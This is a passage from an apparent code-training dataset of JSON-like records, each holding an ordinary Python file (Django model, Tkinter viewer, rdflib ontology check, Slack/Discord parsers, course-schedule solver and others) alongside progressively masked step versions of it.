attributes\n\t\tself.writeLine(\"# Output node attributes\", 1)\n\t\tfor attr in self.outputAttributes:\n\t\t\t# Check if the attribute is numeric or non-numeric (typed)\n\t\t\tif attr[\"type\"] in numericTypes:\n\t\t\t\tattrType = [\"Numeric\", \"Numeric\"]\n\t\t\telse:\n\t\t\t\tattrType = [\"Typed\", \"\"]\n\t\t\tvariableName = className + \".out\" + self.capitalise(attr[\"longName\"])\n\t\t\tfnParameters = \"\\\"\" + attr[\"longName\"] + \"\\\", \\\"\" + attr[\"shortName\"] + \"\\\", om.MFn\" + attrType[1] + \"Data.k\" + attr[\"type\"]\n\t\t\tself.writeLine(variableName + \" = mFn\" + attrType[0] + \"Attribute.create(\" + fnParameters + \")\", 1)\n\t\t\tself.writeLine(\"mFn\" + attrType[0] + \"Attribute.readable = True\", 1)\n\t\t\tself.writeLine(\"mFn\" + attrType[0] + \"Attribute.writable = False\", 1)\n\t\t\tself.writeLine(\"mFn\" + attrType[0] + \"Attribute.storable = False\", 1)\n\t\t\tself.writeLine()\n\t\t# Add the attributes to the class\n\t\tself.writeLine(\"# Add the attributes to the class\", 1)\n\t\tfor attr in self.inputAttributes:\n\t\t\tself.writeLine(className + \".addAttribute(\" + className + \".in\" + self.capitalise(attr[\"longName\"]) + \")\", 1)\n\t\tfor attr in self.outputAttributes:\n\t\t\tself.writeLine(className + \".addAttribute(\" + className + \".out\" + self.capitalise(attr[\"longName\"]) + \")\", 1)\n\t\tself.writeLine()\n\t\t# Write the dependencies\n\t\tself.writeLine(\"# Connect input/output dependencies\", 1)\n\t\tfor attr in self.outputAttributes:\n\t\t\tfor dependency in attr[\"dependencies\"]:\n\t\t\t\t# Check if the dependency is an input attribute\n\t\t\t\ttry:\n\t\t\t\t\td = [x[\"longName\"] for x in self.inputAttributes if (x[\"longName\"] == dependency or x[\"shortName\"] == dependency)][0]\n\t\t\t\t\tself.writeLine(className + \".attributeAffects(\" + className + \".in\" + self.capitalise(d) + \", \" + className + \".out\" + self.capitalise(attr[\"longName\"]) + \")\", 1)\n\t\t\t\texcept:\n\t\t\t\t\tpass\n\t\tself.writeLine()\n\n\t## Write the functions for initializePlugin and uninitializePlugin\n\tdef writeInitialiseUninitialiseFunctions(self):\n\t\t# Write the function for initializePlugin\n\t\tself.writeLine(\"## Initialise the plugin when Maya loads it\")\n\t\tself.writeLine(\"def initializePlugin(mobject):\")\n\t\tself.writeLine(\"mplugin = om.MFnPlugin(mobject)\", 1)\n\t\tself.writeLine(\"try:\", 1)\n\t\tself.writeLine(\"mplugin.registerNode(kPluginNodeName, kPluginNodeID, nodeCreator, nodeInitializer)\", 2)\n\t\tself.writeLine(\"except:\", 1)\n\t\tself.writeLine(\"sys.stderr.write(\\\"Failed to register node: \\\" + kPluginNodeName)\", 2)\n\t\tself.writeLine(\"raise\", 2)\n\t\tself.writeLine()\n\t\t# Write the function for uninitializePlugin\n\t\tself.writeLine(\"## Uninitialise the plugin when Maya unloads it\")\n\t\tself.writeLine(\"def uninitializePlugin(mobject):\")\n\t\tself.writeLine(\"mplugin = om.MFnPlugin(mobject)\", 1)\n\t\tself.writeLine(\"try:\", 1)\n\t\tself.writeLine(\"mplugin.deregisterNode(kPluginNodeID)\", 2)\n\t\tself.writeLine(\"except:\", 1)\n\t\tself.writeLine(\"sys.stderr.write(\\\"Failed to unregister node: \\\" + kPluginNodeName)\", 2)\n\t\tself.writeLine(\"raise\", 2)\n\t\tself.writeLine()\n\n# Main\nDGNodeFileCreator()\n", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
from django.db import models class Link(models.Model): text = models.CharField(max_length=100) link = models.URLField() def __str__(self): return self.text
normal
{ "blob_id": "61a58b934c6663e87824e4f9f9ffd92c3236947c", "index": 7930, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\nclass Link(models.Model):\n <mask token>\n <mask token>\n <mask token>\n", "step-3": "<mask token>\n\n\nclass Link(models.Model):\n <mask token>\n <mask token>\n\n def __str__(self):\n return self.text\n", "step-4": "<mask token>\n\n\nclass Link(models.Model):\n text = models.CharField(max_length=100)\n link = models.URLField()\n\n def __str__(self):\n return self.text\n", "step-5": "from django.db import models\n\n\nclass Link(models.Model):\n text = models.CharField(max_length=100)\n link = models.URLField()\n\n def __str__(self):\n return self.text\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
from activitystreams.core import Object class Actor(Object): """Describes a generic actor.""" pass class Application(Actor): """Describes a software application.""" pass class Group(Actor): """Represents a formal or informal collective of Actors.""" pass class Organization(Actor): """Represents an organization.""" pass class Person(Actor): """Represents an individual person.""" pass class Service(Actor): """Represents a service of any kind.""" pass
normal
{ "blob_id": "b92f24cddae7b392af2417b39bb4f58e3f661cc6", "index": 2785, "step-1": "<mask token>\n\n\nclass Group(Actor):\n \"\"\"Represents a formal or informal collective of Actors.\"\"\"\n pass\n\n\nclass Organization(Actor):\n \"\"\"Represents an organization.\"\"\"\n pass\n\n\nclass Person(Actor):\n \"\"\"Represents an individual person.\"\"\"\n pass\n\n\nclass Service(Actor):\n \"\"\"Represents a service of any kind.\"\"\"\n pass\n", "step-2": "<mask token>\n\n\nclass Application(Actor):\n \"\"\"Describes a software application.\"\"\"\n pass\n\n\nclass Group(Actor):\n \"\"\"Represents a formal or informal collective of Actors.\"\"\"\n pass\n\n\nclass Organization(Actor):\n \"\"\"Represents an organization.\"\"\"\n pass\n\n\nclass Person(Actor):\n \"\"\"Represents an individual person.\"\"\"\n pass\n\n\nclass Service(Actor):\n \"\"\"Represents a service of any kind.\"\"\"\n pass\n", "step-3": "<mask token>\n\n\nclass Actor(Object):\n <mask token>\n pass\n\n\nclass Application(Actor):\n \"\"\"Describes a software application.\"\"\"\n pass\n\n\nclass Group(Actor):\n \"\"\"Represents a formal or informal collective of Actors.\"\"\"\n pass\n\n\nclass Organization(Actor):\n \"\"\"Represents an organization.\"\"\"\n pass\n\n\nclass Person(Actor):\n \"\"\"Represents an individual person.\"\"\"\n pass\n\n\nclass Service(Actor):\n \"\"\"Represents a service of any kind.\"\"\"\n pass\n", "step-4": "<mask token>\n\n\nclass Actor(Object):\n \"\"\"Describes a generic actor.\"\"\"\n pass\n\n\nclass Application(Actor):\n \"\"\"Describes a software application.\"\"\"\n pass\n\n\nclass Group(Actor):\n \"\"\"Represents a formal or informal collective of Actors.\"\"\"\n pass\n\n\nclass Organization(Actor):\n \"\"\"Represents an organization.\"\"\"\n pass\n\n\nclass Person(Actor):\n \"\"\"Represents an individual person.\"\"\"\n pass\n\n\nclass Service(Actor):\n \"\"\"Represents a service of any kind.\"\"\"\n pass\n", "step-5": "from activitystreams.core import Object\n\n\nclass Actor(Object):\n \"\"\"Describes a generic actor.\"\"\"\n pass\n\n\nclass Application(Actor):\n \"\"\"Describes a software application.\"\"\"\n pass\n\n\nclass Group(Actor):\n \"\"\"Represents a formal or informal collective of Actors.\"\"\"\n pass\n\n\nclass Organization(Actor):\n \"\"\"Represents an organization.\"\"\"\n pass\n\n\nclass Person(Actor):\n \"\"\"Represents an individual person.\"\"\"\n pass\n\n\nclass Service(Actor):\n \"\"\"Represents a service of any kind.\"\"\"\n pass\n", "step-ids": [ 8, 10, 11, 12, 13 ] }
[ 8, 10, 11, 12, 13 ]
from tkinter import * from PIL import ImageTk,Image import sys, os # This will display images and icon root = Tk() root.title("Expanding GUI") # With ubuntu, it did not work the icon part #root.iconbitmap('@/home/gxgarciat/Documents/Tkinter/gdrive.ico') #root.iconphoto(True, PhotoImage(file="@/home/gxgarciat/Documents/Tkinter/gdrive.ico")) #root.iconbitmap(os.path.join(sys.path[0], "/home/gxgarciat/Documents/Tkinter/gdrive.ico")) #root.iconbitmap('~home/gxgarciat/Documents/Tkinter/gdrive.ico') #root.iconphoto(False, Tk.PhotoImage(file='/home/gxgarciat/Documents/Tkinter/gdrive.ico')) # Importing images is a 3 step process here. my_img = ImageTk.PhotoImage(Image.open("googledrive.png")) my_label = Label(image=my_img) my_label.pack() # Adding a quit button buttonquit = Button(root,text="Exit program",command=root.quit) buttonquit.pack() root.mainloop()
normal
{ "blob_id": "2da10163a40c9720ca9deecd9afb0e39aa885546", "index": 5523, "step-1": "<mask token>\n", "step-2": "<mask token>\nroot.title('Expanding GUI')\n<mask token>\nmy_label.pack()\n<mask token>\nbuttonquit.pack()\nroot.mainloop()\n", "step-3": "<mask token>\nroot = Tk()\nroot.title('Expanding GUI')\nmy_img = ImageTk.PhotoImage(Image.open('googledrive.png'))\nmy_label = Label(image=my_img)\nmy_label.pack()\nbuttonquit = Button(root, text='Exit program', command=root.quit)\nbuttonquit.pack()\nroot.mainloop()\n", "step-4": "from tkinter import *\nfrom PIL import ImageTk, Image\nimport sys, os\nroot = Tk()\nroot.title('Expanding GUI')\nmy_img = ImageTk.PhotoImage(Image.open('googledrive.png'))\nmy_label = Label(image=my_img)\nmy_label.pack()\nbuttonquit = Button(root, text='Exit program', command=root.quit)\nbuttonquit.pack()\nroot.mainloop()\n", "step-5": "from tkinter import *\nfrom PIL import ImageTk,Image\n\nimport sys, os\n\n# This will display images and icon\n\nroot = Tk()\nroot.title(\"Expanding GUI\")\n\n# With ubuntu, it did not work the icon part\n#root.iconbitmap('@/home/gxgarciat/Documents/Tkinter/gdrive.ico')\n#root.iconphoto(True, PhotoImage(file=\"@/home/gxgarciat/Documents/Tkinter/gdrive.ico\"))\n#root.iconbitmap(os.path.join(sys.path[0], \"/home/gxgarciat/Documents/Tkinter/gdrive.ico\"))\n#root.iconbitmap('~home/gxgarciat/Documents/Tkinter/gdrive.ico')\n#root.iconphoto(False, Tk.PhotoImage(file='/home/gxgarciat/Documents/Tkinter/gdrive.ico'))\n\n\n# Importing images is a 3 step process here.\nmy_img = ImageTk.PhotoImage(Image.open(\"googledrive.png\"))\nmy_label = Label(image=my_img)\nmy_label.pack()\n\n# Adding a quit button\nbuttonquit = Button(root,text=\"Exit program\",command=root.quit)\nbuttonquit.pack()\n\nroot.mainloop()\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
x, y = map(int, input().split()) print(max((y - x + 9) // 10, 0))
normal
{ "blob_id": "c9f3e956d4016846c8efe0382b79882559d6ce64", "index": 1488, "step-1": "<mask token>\n", "step-2": "<mask token>\nprint(max((y - x + 9) // 10, 0))\n", "step-3": "x, y = map(int, input().split())\nprint(max((y - x + 9) // 10, 0))\n", "step-4": null, "step-5": null, "step-ids": [ 0, 1, 2 ] }
[ 0, 1, 2 ]
from rdflib import Graph from rdflib.plugins.sparql import prepareQuery def is_file_ontology(file_path): """ Method that, given a file, returns its URI. This method is in a separate file in case we want to extract additional metadata if required Parameters ---------- @param file_path: path of the candidate ontology Returns ------- @return: The URI of the target ontology (if there is one) """ # load in rdf lib try: g = Graph() g.parse(file_path) q1 = prepareQuery(''' SELECT ?onto WHERE { ?onto a <http://www.w3.org/2002/07/owl#Ontology>. } ''') # TO DO: extract title, preferred ns. # there should be only one ontology per file for r in g.query(q1): # print("Found that %s is an ontology" % file_path) return r.onto except Exception: # If the candidate file could not be read, pass pass
normal
{ "blob_id": "c327f8f7aece1a9c25079613809df52e9a8e7a52", "index": 8763, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\ndef is_file_ontology(file_path):\n \"\"\"\n Method that, given a file, returns its URI.\n This method is in a separate file in case we want to extract additional metadata if required\n Parameters\n ----------\n @param file_path: path of the candidate ontology\n\n Returns\n -------\n @return: The URI of the target ontology (if there is one)\n \"\"\"\n try:\n g = Graph()\n g.parse(file_path)\n q1 = prepareQuery(\n \"\"\"\n SELECT ?onto\n WHERE { \n ?onto a <http://www.w3.org/2002/07/owl#Ontology>. \n }\n \"\"\"\n )\n for r in g.query(q1):\n return r.onto\n except Exception:\n pass\n", "step-3": "from rdflib import Graph\nfrom rdflib.plugins.sparql import prepareQuery\n\n\ndef is_file_ontology(file_path):\n \"\"\"\n Method that, given a file, returns its URI.\n This method is in a separate file in case we want to extract additional metadata if required\n Parameters\n ----------\n @param file_path: path of the candidate ontology\n\n Returns\n -------\n @return: The URI of the target ontology (if there is one)\n \"\"\"\n try:\n g = Graph()\n g.parse(file_path)\n q1 = prepareQuery(\n \"\"\"\n SELECT ?onto\n WHERE { \n ?onto a <http://www.w3.org/2002/07/owl#Ontology>. \n }\n \"\"\"\n )\n for r in g.query(q1):\n return r.onto\n except Exception:\n pass\n", "step-4": "from rdflib import Graph\nfrom rdflib.plugins.sparql import prepareQuery\n\n\ndef is_file_ontology(file_path):\n \"\"\"\n Method that, given a file, returns its URI.\n This method is in a separate file in case we want to extract additional metadata if required\n Parameters\n ----------\n @param file_path: path of the candidate ontology\n\n Returns\n -------\n @return: The URI of the target ontology (if there is one)\n \"\"\"\n # load in rdf lib\n try:\n g = Graph()\n g.parse(file_path)\n q1 = prepareQuery('''\n SELECT ?onto\n WHERE { \n ?onto a <http://www.w3.org/2002/07/owl#Ontology>. \n }\n ''')\n # TO DO: extract title, preferred ns.\n # there should be only one ontology per file\n for r in g.query(q1):\n # print(\"Found that %s is an ontology\" % file_path)\n return r.onto\n except Exception:\n # If the candidate file could not be read, pass\n pass\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
was = input() print(was)
normal
{ "blob_id": "e12c411814efd7cc7417174b51f0f756589ca40b", "index": 3325, "step-1": "<mask token>\n", "step-2": "<mask token>\nprint(was)\n", "step-3": "was = input()\nprint(was)\n", "step-4": null, "step-5": null, "step-ids": [ 0, 1, 2 ] }
[ 0, 1, 2 ]
"""slack_utils.py: slack-specific utilities""" from os import path import pprint HERE = path.abspath(path.dirname(__file__)) PP = pprint.PrettyPrinter(indent=2) def parse_slack_message_object(message_obj): """parse user_name/channel_name out of slack controller Notes: `slackbot.message`.keys(): [type, channel, user, text, ts, source_team, team] Args: message_obj (:obj:`slackbot.message`): response object for slack Returns: dict: message data """ metadata = dict(message_obj._body) try: metadata['channel_name'] = message_obj._client.channels[metadata['channel']]['name'] except KeyError: metadata['channel_name'] = 'DIRECT_MESSAGE:{}'.format( message_obj._client.users[metadata['user']]['name'] ) metadata['user_name'] = message_obj._client.users[metadata['user']]['name'] metadata['team_name'] = message_obj._client.login_data['team']['name'] return metadata def parse_discord_context_object(context_obj): """parse user_name/channel_name out of discord controller Args: context_obj (:obj:`discord.context`): response object for discord Returns: dict: standardized message data """ metadata = dict() # TODO: all context_obj.message.{children}.name values metadata['user_name'] = context_obj.message.author.name metadata['team_name'] = context_obj.message.server.name try: metadata['channel_name'] = context_obj.message.channel.name except Exception: metadata['channel_name'] = 'DIRECT_MESSAGE:{}'.format(context_obj.message.author.name) return metadata
normal
{ "blob_id": "2df2cccc22aba2104ab15820e13d304addf83f63", "index": 7163, "step-1": "<mask token>\n\n\ndef parse_slack_message_object(message_obj):\n \"\"\"parse user_name/channel_name out of slack controller\n\n Notes:\n `slackbot.message`.keys(): [type, channel, user, text, ts, source_team, team]\n\n Args:\n message_obj (:obj:`slackbot.message`): response object for slack\n\n Returns:\n dict: message data\n\n \"\"\"\n metadata = dict(message_obj._body)\n try:\n metadata['channel_name'] = message_obj._client.channels[metadata[\n 'channel']]['name']\n except KeyError:\n metadata['channel_name'] = 'DIRECT_MESSAGE:{}'.format(message_obj.\n _client.users[metadata['user']]['name'])\n metadata['user_name'] = message_obj._client.users[metadata['user']]['name']\n metadata['team_name'] = message_obj._client.login_data['team']['name']\n return metadata\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef parse_slack_message_object(message_obj):\n \"\"\"parse user_name/channel_name out of slack controller\n\n Notes:\n `slackbot.message`.keys(): [type, channel, user, text, ts, source_team, team]\n\n Args:\n message_obj (:obj:`slackbot.message`): response object for slack\n\n Returns:\n dict: message data\n\n \"\"\"\n metadata = dict(message_obj._body)\n try:\n metadata['channel_name'] = message_obj._client.channels[metadata[\n 'channel']]['name']\n except KeyError:\n metadata['channel_name'] = 'DIRECT_MESSAGE:{}'.format(message_obj.\n _client.users[metadata['user']]['name'])\n metadata['user_name'] = message_obj._client.users[metadata['user']]['name']\n metadata['team_name'] = message_obj._client.login_data['team']['name']\n return metadata\n\n\ndef parse_discord_context_object(context_obj):\n \"\"\"parse user_name/channel_name out of discord controller\n\n Args:\n context_obj (:obj:`discord.context`): response object for discord\n\n Returns:\n dict: standardized message data\n\n \"\"\"\n metadata = dict()\n metadata['user_name'] = context_obj.message.author.name\n metadata['team_name'] = context_obj.message.server.name\n try:\n metadata['channel_name'] = context_obj.message.channel.name\n except Exception:\n metadata['channel_name'] = 'DIRECT_MESSAGE:{}'.format(context_obj.\n message.author.name)\n return metadata\n", "step-3": "<mask token>\nHERE = path.abspath(path.dirname(__file__))\nPP = pprint.PrettyPrinter(indent=2)\n\n\ndef parse_slack_message_object(message_obj):\n \"\"\"parse user_name/channel_name out of slack controller\n\n Notes:\n `slackbot.message`.keys(): [type, channel, user, text, ts, source_team, team]\n\n Args:\n message_obj (:obj:`slackbot.message`): response object for slack\n\n Returns:\n dict: message data\n\n \"\"\"\n metadata = dict(message_obj._body)\n try:\n metadata['channel_name'] = message_obj._client.channels[metadata[\n 'channel']]['name']\n except KeyError:\n metadata['channel_name'] = 'DIRECT_MESSAGE:{}'.format(message_obj.\n _client.users[metadata['user']]['name'])\n metadata['user_name'] = message_obj._client.users[metadata['user']]['name']\n metadata['team_name'] = message_obj._client.login_data['team']['name']\n return metadata\n\n\ndef parse_discord_context_object(context_obj):\n \"\"\"parse user_name/channel_name out of discord controller\n\n Args:\n context_obj (:obj:`discord.context`): response object for discord\n\n Returns:\n dict: standardized message data\n\n \"\"\"\n metadata = dict()\n metadata['user_name'] = context_obj.message.author.name\n metadata['team_name'] = context_obj.message.server.name\n try:\n metadata['channel_name'] = context_obj.message.channel.name\n except Exception:\n metadata['channel_name'] = 'DIRECT_MESSAGE:{}'.format(context_obj.\n message.author.name)\n return metadata\n", "step-4": "<mask token>\nfrom os import path\nimport pprint\nHERE = path.abspath(path.dirname(__file__))\nPP = pprint.PrettyPrinter(indent=2)\n\n\ndef parse_slack_message_object(message_obj):\n \"\"\"parse user_name/channel_name out of slack controller\n\n Notes:\n `slackbot.message`.keys(): [type, channel, user, text, ts, source_team, team]\n\n Args:\n message_obj (:obj:`slackbot.message`): response object for slack\n\n Returns:\n dict: message data\n\n \"\"\"\n metadata = dict(message_obj._body)\n try:\n metadata['channel_name'] = message_obj._client.channels[metadata[\n 'channel']]['name']\n except KeyError:\n metadata['channel_name'] = 'DIRECT_MESSAGE:{}'.format(message_obj.\n _client.users[metadata['user']]['name'])\n metadata['user_name'] = message_obj._client.users[metadata['user']]['name']\n metadata['team_name'] = message_obj._client.login_data['team']['name']\n return metadata\n\n\ndef parse_discord_context_object(context_obj):\n \"\"\"parse user_name/channel_name out of discord controller\n\n Args:\n context_obj (:obj:`discord.context`): response object for discord\n\n Returns:\n dict: standardized message data\n\n \"\"\"\n metadata = dict()\n metadata['user_name'] = context_obj.message.author.name\n metadata['team_name'] = context_obj.message.server.name\n try:\n metadata['channel_name'] = context_obj.message.channel.name\n except Exception:\n metadata['channel_name'] = 'DIRECT_MESSAGE:{}'.format(context_obj.\n message.author.name)\n return metadata\n", "step-5": "\"\"\"slack_utils.py: slack-specific utilities\"\"\"\nfrom os import path\nimport pprint\n\nHERE = path.abspath(path.dirname(__file__))\nPP = pprint.PrettyPrinter(indent=2)\n\ndef parse_slack_message_object(message_obj):\n \"\"\"parse user_name/channel_name out of slack controller\n\n Notes:\n `slackbot.message`.keys(): [type, channel, user, text, ts, source_team, team]\n\n Args:\n message_obj (:obj:`slackbot.message`): response object for slack\n\n Returns:\n dict: message data\n\n \"\"\"\n metadata = dict(message_obj._body)\n try:\n metadata['channel_name'] = message_obj._client.channels[metadata['channel']]['name']\n except KeyError:\n metadata['channel_name'] = 'DIRECT_MESSAGE:{}'.format(\n message_obj._client.users[metadata['user']]['name']\n )\n metadata['user_name'] = message_obj._client.users[metadata['user']]['name']\n metadata['team_name'] = message_obj._client.login_data['team']['name']\n\n return metadata\n\ndef parse_discord_context_object(context_obj):\n \"\"\"parse user_name/channel_name out of discord controller\n\n Args:\n context_obj (:obj:`discord.context`): response object for discord\n\n Returns:\n dict: standardized message data\n\n \"\"\"\n metadata = dict() # TODO: all context_obj.message.{children}.name values\n metadata['user_name'] = context_obj.message.author.name\n metadata['team_name'] = context_obj.message.server.name\n try:\n metadata['channel_name'] = context_obj.message.channel.name\n except Exception:\n metadata['channel_name'] = 'DIRECT_MESSAGE:{}'.format(context_obj.message.author.name)\n\n return metadata\n", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
#! /usr/bin/env python3 import arg_parser import colors import logging import sys def parse_args(argv): parser = arg_parser.RemoteRunArgParser() return parser.parse(argv[1:]) def main(argv): logging.basicConfig( format='%(levelname)s: %(message)s', level='INFO', handlers=[colors.ColorizingStreamHandler(sys.stderr)]) try: args = parse_args(argv) except Exception as exc: logging.exception(exc) return 1 try: action = args['action'](args) except Exception as exc: logging.error(exc) return 1 try: return not action.launch() except Exception as exc: if 'log_level' in action.config and action.config['log_level'] == 'DEBUG': logging.exception(exc) else: logging.error(str(exc)) return 2 if __name__ == '__main__': sys.exit(main(sys.argv))
normal
{ "blob_id": "72d1a0689d4cc4f78007c0cfa01611e95de76176", "index": 3908, "step-1": "<mask token>\n\n\ndef main(argv):\n logging.basicConfig(format='%(levelname)s: %(message)s', level='INFO',\n handlers=[colors.ColorizingStreamHandler(sys.stderr)])\n try:\n args = parse_args(argv)\n except Exception as exc:\n logging.exception(exc)\n return 1\n try:\n action = args['action'](args)\n except Exception as exc:\n logging.error(exc)\n return 1\n try:\n return not action.launch()\n except Exception as exc:\n if 'log_level' in action.config and action.config['log_level'\n ] == 'DEBUG':\n logging.exception(exc)\n else:\n logging.error(str(exc))\n return 2\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef parse_args(argv):\n parser = arg_parser.RemoteRunArgParser()\n return parser.parse(argv[1:])\n\n\ndef main(argv):\n logging.basicConfig(format='%(levelname)s: %(message)s', level='INFO',\n handlers=[colors.ColorizingStreamHandler(sys.stderr)])\n try:\n args = parse_args(argv)\n except Exception as exc:\n logging.exception(exc)\n return 1\n try:\n action = args['action'](args)\n except Exception as exc:\n logging.error(exc)\n return 1\n try:\n return not action.launch()\n except Exception as exc:\n if 'log_level' in action.config and action.config['log_level'\n ] == 'DEBUG':\n logging.exception(exc)\n else:\n logging.error(str(exc))\n return 2\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\ndef parse_args(argv):\n parser = arg_parser.RemoteRunArgParser()\n return parser.parse(argv[1:])\n\n\ndef main(argv):\n logging.basicConfig(format='%(levelname)s: %(message)s', level='INFO',\n handlers=[colors.ColorizingStreamHandler(sys.stderr)])\n try:\n args = parse_args(argv)\n except Exception as exc:\n logging.exception(exc)\n return 1\n try:\n action = args['action'](args)\n except Exception as exc:\n logging.error(exc)\n return 1\n try:\n return not action.launch()\n except Exception as exc:\n if 'log_level' in action.config and action.config['log_level'\n ] == 'DEBUG':\n logging.exception(exc)\n else:\n logging.error(str(exc))\n return 2\n\n\nif __name__ == '__main__':\n sys.exit(main(sys.argv))\n", "step-4": "import arg_parser\nimport colors\nimport logging\nimport sys\n\n\ndef parse_args(argv):\n parser = arg_parser.RemoteRunArgParser()\n return parser.parse(argv[1:])\n\n\ndef main(argv):\n logging.basicConfig(format='%(levelname)s: %(message)s', level='INFO',\n handlers=[colors.ColorizingStreamHandler(sys.stderr)])\n try:\n args = parse_args(argv)\n except Exception as exc:\n logging.exception(exc)\n return 1\n try:\n action = args['action'](args)\n except Exception as exc:\n logging.error(exc)\n return 1\n try:\n return not action.launch()\n except Exception as exc:\n if 'log_level' in action.config and action.config['log_level'\n ] == 'DEBUG':\n logging.exception(exc)\n else:\n logging.error(str(exc))\n return 2\n\n\nif __name__ == '__main__':\n sys.exit(main(sys.argv))\n", "step-5": "#! /usr/bin/env python3\n\nimport arg_parser\nimport colors\n\nimport logging\nimport sys\n\ndef parse_args(argv):\n parser = arg_parser.RemoteRunArgParser()\n return parser.parse(argv[1:])\n\n\ndef main(argv):\n logging.basicConfig(\n format='%(levelname)s: %(message)s',\n level='INFO',\n handlers=[colors.ColorizingStreamHandler(sys.stderr)])\n\n try:\n args = parse_args(argv)\n except Exception as exc:\n logging.exception(exc)\n return 1\n \n try:\n action = args['action'](args)\n except Exception as exc:\n logging.error(exc)\n return 1\n \n try:\n return not action.launch()\n except Exception as exc:\n if 'log_level' in action.config and action.config['log_level'] == 'DEBUG':\n logging.exception(exc)\n else:\n logging.error(str(exc))\n return 2\n\nif __name__ == '__main__':\n sys.exit(main(sys.argv))\n", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
#!/usr/bin/env python import sys import random def apply(mine, target, diff): if mine == [1, 1, 1, 1] or target == [1, 1, 1, 1]: return -1 if diff < 0: for i in range(0, 4): if i - diff < 4: mine[i] = mine[i - diff] else: mine[i] = 0 elif diff > 0: for i in range(3, -1, -1): if i - diff > -1: mine[i] = mine[i - diff] else: mine[i] = 0 count = 0 for i in range(0, 4): target[i] ^= mine[i] if target[i]: count += 1 return count while True: turn = int(raw_input()) finger = [[], []] for i in range(0, 2): for j in range(0, 2): finger[i].append([int(k) for k in raw_input().split()]) maximum = -1 response = [] for i in range(0, 2): for j in range(0, 2): for k in range(-3, 4): result = apply(finger[0][i], finger[1][j], k) if result > maximum: maximum = result response = [(i, j, k)] elif result == maximum: response.append((i, j, k)) if maximum != -1: print ' '.join([str(i) for i in random.choice(response)]) else: print '2 2 0' sys.stdout.flush()
normal
{ "blob_id": "44d1412d48886eb9126a895d61004e6ccbd4850b", "index": 7636, "step-1": "#!/usr/bin/env python\nimport sys\nimport random\n\ndef apply(mine, target, diff):\n\tif mine == [1, 1, 1, 1] or target == [1, 1, 1, 1]:\n\t\treturn -1\n\n\tif diff < 0:\n\t\tfor i in range(0, 4):\n\t\t\tif i - diff < 4:\n\t\t\t\tmine[i] = mine[i - diff]\n\t\t\telse:\n\t\t\t\tmine[i] = 0\n\telif diff > 0:\n\t\tfor i in range(3, -1, -1):\n\t\t\tif i - diff > -1:\n\t\t\t\tmine[i] = mine[i - diff]\n\t\t\telse:\n\t\t\t\tmine[i] = 0\n\n\tcount = 0\n\tfor i in range(0, 4):\n\t\ttarget[i] ^= mine[i]\n\t\tif target[i]:\n\t\t\tcount += 1\n\treturn count\n\nwhile True:\n\tturn = int(raw_input())\n\tfinger = [[], []]\n\tfor i in range(0, 2):\n\t\tfor j in range(0, 2):\n\t\t\tfinger[i].append([int(k) for k in raw_input().split()])\n\n\tmaximum = -1\n\tresponse = []\n\tfor i in range(0, 2):\n\t\tfor j in range(0, 2):\n\t\t\tfor k in range(-3, 4):\n\t\t\t\tresult = apply(finger[0][i], finger[1][j], k)\n\t\t\t\tif result > maximum:\n\t\t\t\t\tmaximum = result\n\t\t\t\t\tresponse = [(i, j, k)]\n\t\t\t\telif result == maximum:\n\t\t\t\t\tresponse.append((i, j, k))\n\t\n\tif maximum != -1:\n\t\tprint ' '.join([str(i) for i in random.choice(response)])\n\telse:\n\t\tprint '2 2 0'\n\tsys.stdout.flush()\n", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
from typing import List class CourseSchedule: """ Problem: Course Schedule (#207) Key Insights: 1. Create adjaceny list of courses to prerequisites. 2. Use DFS and visited set to detect a cycle. If there is a cycle, cannot finish all the courses. 3. Remember to remove a course (node) from visited set if that course is "cleared" (able to take the course). 4. Note that this is not a cycle (so if don't remove node in step 3, would incorrectly identify this as a cycle): 1 -> 2 -> 3 2 -> 4 -> 3 More info: 1. Concept of Topological order: for an edge uv, u must always come before v (so no cycles where v also comes before u) Time Complexity: O(V + E): 1. Create pre_map: O(P), P: prerequisites a. We're iterating through the list of prereqs 2. Call dfs: O(C), C: courses a. We're iterating through all the courses once 3. dfs: O(V + E) a. We visit each course and each edge at most once Space Complexity: O(V + E) 1. Create pre_map: O(V + E), V: courses, E: prereqs 2. dfs call stack: O(V + E) """ def can_finish(self, numCourses: int, prerequisites: List[List[int]] ) ->bool: pre_map = {i: [] for i in range(numCourses)} for crs, pre in prerequisites: pre_map[crs].append(pre) visited_set = set() def dfs(crs): if crs in visited_set: return False if pre_map[crs] == []: return True visited_set.add(crs) for pre in pre_map[crs]: if not dfs(pre): return False visited_set.remove(crs) pre_map[crs] = [] return True for crs in range(numCourses): if not dfs(crs): return False return True
normal
{ "blob_id": "7c53c7bec6b6b2d4d6be89b750eeef83ca9115cc", "index": 2960, "step-1": "<mask token>\n\n\nclass CourseSchedule:\n <mask token>\n <mask token>\n", "step-2": "<mask token>\n\n\nclass CourseSchedule:\n <mask token>\n\n def can_finish(self, numCourses: int, prerequisites: List[List[int]]\n ) ->bool:\n pre_map = {i: [] for i in range(numCourses)}\n for crs, pre in prerequisites:\n pre_map[crs].append(pre)\n visited_set = set()\n\n def dfs(crs):\n if crs in visited_set:\n return False\n if pre_map[crs] == []:\n return True\n visited_set.add(crs)\n for pre in pre_map[crs]:\n if not dfs(pre):\n return False\n visited_set.remove(crs)\n pre_map[crs] = []\n return True\n for crs in range(numCourses):\n if not dfs(crs):\n return False\n return True\n", "step-3": "<mask token>\n\n\nclass CourseSchedule:\n \"\"\"\n Problem: Course Schedule (#207)\n Key Insights:\n 1. Create adjaceny list of courses to prerequisites.\n 2. Use DFS and visited set to detect a cycle. If there is a cycle, cannot finish all the courses.\n 3. Remember to remove a course (node) from visited set if that course is \"cleared\" (able to take the course). \n 4. Note that this is not a cycle 